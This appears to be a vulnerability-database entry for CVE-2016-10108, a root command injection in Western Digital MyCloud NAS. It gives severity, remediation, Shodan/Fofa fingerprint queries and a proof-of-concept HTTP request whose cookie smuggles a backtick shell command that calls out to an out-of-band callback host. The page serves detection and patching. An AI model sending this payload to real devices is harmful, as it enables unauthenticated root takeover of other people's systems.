🔙 목록으로 돌아가기

CVE-2016-10108: Western Digital MyCloud NAS - Command Injection

TitleWestern Digital MyCloud NAS - Command Injection
AuthorDhiyaneshDk
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.
RemediationApply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.
CVSS Score9.8
EPSS Score0.91759
CVE IDCVE-2016-10108
CWE IDCWE-77
Shodan Queryhttp.favicon.hash:-1074357885
Fofa Queryicon_hash=-1074357885
Tags cve2016 cve packetstorm rce oast wdcloud western_digital vkev vuln

🔍 Vulnerability Description

Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.1
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 d5jqi49le0o2to5t1bg0fjpfthwpest53.oast.fun`; local_login=1
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10108.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10108.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A